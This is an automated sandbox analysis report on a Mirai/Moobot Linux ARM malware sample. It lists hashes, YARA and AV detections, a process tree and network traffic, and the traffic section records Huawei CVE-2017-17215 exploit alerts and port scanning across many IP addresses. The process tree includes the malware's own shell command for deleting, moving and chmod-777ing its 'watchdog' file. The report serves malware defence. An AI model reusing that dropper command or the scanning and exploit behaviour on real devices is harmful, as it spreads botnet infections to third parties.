Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
k8CCRUs7Yi.elf

Overview

General Information

Sample Name:k8CCRUs7Yi.elf
Original Sample Name:24ae840c001c6640f8caac05c7e242a4.elf
Analysis ID:830800
MD5:24ae840c001c6640f8caac05c7e242a4
SHA1:fa8b9707a0843bb71e6c0e9227a9363cc00ea606
SHA256:3f104601238dda5a4860278edfff7a0fa8460b675278275bae18a13168667029
Tags:32armelfmirai
Infos:

Detection

Mirai, Moobot
Score:96
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Moobot
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Contains symbols with names commonly found in malware
Sets full permissions to files and/or directories
Yara signature match
Executes the "mkdir" command used to create folders
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "chmod" command used to modify permissions
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Sample and/or dropped files contains symbols with suspicious names
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

All domains contacted by the sample do not resolve. The sample is likely an old dropper which does no longer work.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox Version:37.0.0 Beryl
Analysis ID:830800
Start date and time:2023-03-20 17:46:09 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 30s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:k8CCRUs7Yi.elf
Original Sample Name:24ae840c001c6640f8caac05c7e242a4.elf
Detection:MAL
Classification:mal96.troj.linELF@0/0@105/0
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
Command:/tmp/k8CCRUs7Yi.elf
PID:6232
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
^p
Standard Error:chmod: cannot access 'bin/watchdog'$'\373\376\377\214\373\376\377\220\244\002': No such file or directory
  • system is lnxubuntu20
  • k8CCRUs7Yi.elf (PID: 6232, Parent: 6126, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/k8CCRUs7Yi.elf
    • sh (PID: 6234, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv /tmp/k8CCRUs7Yi.elf bin/watchdog; chmod 777 bin/watchdog\\xfb\\xfe\\xff\\x8c\\xfb\\xfe\\xff\\x90\\xa4"
      • sh New Fork (PID: 6236, Parent: 6234)
      • rm (PID: 6236, Parent: 6234, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/watchdog
      • sh New Fork (PID: 6237, Parent: 6234)
      • mkdir (PID: 6237, Parent: 6234, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin
      • sh New Fork (PID: 6238, Parent: 6234)
      • mv (PID: 6238, Parent: 6234, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /tmp/k8CCRUs7Yi.elf bin/watchdog
      • sh New Fork (PID: 6239, Parent: 6234)
      • chmod (PID: 6239, Parent: 6234, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 bin/watchdog\\xfb\\xfe\\xff\\x8c\\xfb\\xfe\\xff\\x90\\xa4
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
MooBotNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot
SourceRuleDescriptionAuthorStrings
k8CCRUs7Yi.elfJoeSecurity_MoobotYara detected MoobotJoe Security
    k8CCRUs7Yi.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      k8CCRUs7Yi.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x1411c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x14130:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x14144:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x14158:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1416c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x14180:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x14194:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x141a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x141bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x141d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x141e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x141f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1420c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x14220:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x14234:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x14248:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1425c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x14270:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x14284:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x14298:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x142ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      SourceRuleDescriptionAuthorStrings
      6232.1.00007f281c017000.00007f281c02d000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
        6232.1.00007f281c017000.00007f281c02d000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6232.1.00007f281c017000.00007f281c02d000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x1411c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x14130:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x14144:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x14158:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1416c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x14180:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x14194:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x141a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x141bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x141d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x141e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x141f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1420c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x14220:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x14234:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x14248:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1425c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x14270:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x14284:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x14298:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x142ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          6243.1.00007f281c017000.00007f281c02d000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
            6243.1.00007f281c017000.00007f281c02d000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              Click to see the 5 entries
              Timestamp:192.168.2.23197.39.107.16136752372152835222 03/20/23-17:47:11.547445
              SID:2835222
              Source Port:36752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2341.237.23.22647280372152835222 03/20/23-17:48:58.233356
              SID:2835222
              Source Port:47280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23211.35.61.2738110372152835222 03/20/23-17:48:12.959548
              SID:2835222
              Source Port:38110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23202.108.169.15353818372152835222 03/20/23-17:48:12.885568
              SID:2835222
              Source Port:53818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2335.190.101.6838784372152835222 03/20/23-17:46:58.246045
              SID:2835222
              Source Port:38784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23147.46.86.1455690372152835222 03/20/23-17:47:22.978510
              SID:2835222
              Source Port:55690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: k8CCRUs7Yi.elfReversingLabs: Detection: 56%
              Source: k8CCRUs7Yi.elfVirustotal: Detection: 47%Perma Link

              Networking

              barindex
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38784 -> 35.190.101.68:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36752 -> 197.39.107.161:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55690 -> 147.46.86.14:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53818 -> 202.108.169.153:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38110 -> 211.35.61.27:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47280 -> 41.237.23.226:37215
              Source: global trafficTCP traffic: 35.190.101.68 ports 1,2,3,5,7,37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38784 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36752 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36752 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 36752
              Source: unknownNetwork traffic detected: HTTP traffic on port 55690 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53818 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38110 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38110 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53818 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38110 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53818 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38110 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53818 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38110 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53818 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38110 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53818 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38110 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53818 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47280 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 47280
              Source: unknownNetwork traffic detected: HTTP traffic on port 38110 -> 37215
              Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
              Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
              Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.140.61.123:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.240.88.160:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.19.172.198:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.23.197.218:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.20.100.157:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.206.94.17:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.226.233.136:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.127.3.23:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.121.254.179:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.74.250.109:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.40.73.153:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 134.83.64.211:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.83.16.170:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.203.101.217:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.243.32.149:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 48.254.205.245:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.186.63.207:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.102.3.100:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 78.88.48.25:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 182.182.121.123:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.179.102.31:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 101.184.84.152:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.131.244.6:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.32.103.147:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.120.24.170:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.122.188.124:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.90.65.156:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.106.165.108:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 9.177.81.147:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.21.10.181:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 102.254.17.249:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 51.63.195.100:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.220.141.106:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.36.48.54:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.108.157.134:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.232.191.100:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.144.194.128:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.81.21.130:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.220.136.16:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.107.127.238:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.114.202.144:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 51.251.230.240:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.88.254.0:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 168.100.76.1:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 48.161.11.245:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.12.122.129:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.70.12.236:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 121.221.89.180:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.145.28.44:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.153.92.217:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 120.223.16.236:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.76.23.247:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.152.191.139:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.237.255.94:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.60.207.8:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.18.43.116:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.153.143.169:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.173.32.192:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.61.136.137:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.114.102.122:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.0.126.142:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.218.87.25:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.68.222.44:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 57.132.232.76:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.251.254.111:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.166.234.187:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 98.180.206.143:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 25.56.69.168:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.81.145.35:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.246.182.250:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.117.36.207:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 98.178.43.202:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.79.4.101:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.210.143.5:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.35.210.146:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.29.220.168:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.200.80.52:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.95.111.135:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.124.201.189:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 177.139.13.182:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.131.232.61:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.164.182.169:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.122.126.189:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 150.113.120.248:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.254.203.47:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.195.48.89:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.2.106.165:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.212.39.117:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.17.61.84:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.108.177.178:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 40.96.192.34:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.116.196.199:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.81.93.183:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.219.152.209:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 93.116.1.245:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 63.185.232.143:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.87.46.180:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.146.127.21:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.159.52.49:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.247.157.188:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.113.225.224:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 18.84.122.71:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 95.168.126.66:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.21.93.228:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.246.19.56:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.198.74.97:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 36.218.171.5:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 204.130.146.145:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.81.63.131:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.218.125.24:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.224.127.215:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.176.234.248:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.214.78.211:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.60.216.140:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 19.51.109.139:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.103.32.13:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 40.112.95.143:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.157.42.61:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 189.48.83.11:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.133.252.121:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.35.75.20:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 150.132.232.64:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.43.63.222:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 153.100.70.171:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.111.211.90:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.114.29.231:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.87.50.109:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.166.91.111:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.18.80.43:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 212.245.58.119:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.116.6.158:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.233.148.136:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.80.40.163:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.255.104.37:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.255.143.24:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 59.245.123.183:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.208.229.251:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.47.22.91:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.196.229.216:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.143.169.243:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 144.114.232.90:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.8.68.195:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.197.138.66:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 156.147.198.1:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.178.209.144:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.77.96.221:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.128.220.220:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 193.250.136.198:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.194.209.119:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.155.137.24:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.249.149.64:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.204.225.204:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 213.142.13.152:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.174.152.207:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 174.33.50.59:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 60.139.141.140:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.195.181.173:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.119.219.29:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.103.26.169:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.247.40.155:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 147.237.246.136:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.175.82.158:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.144.236.229:37215
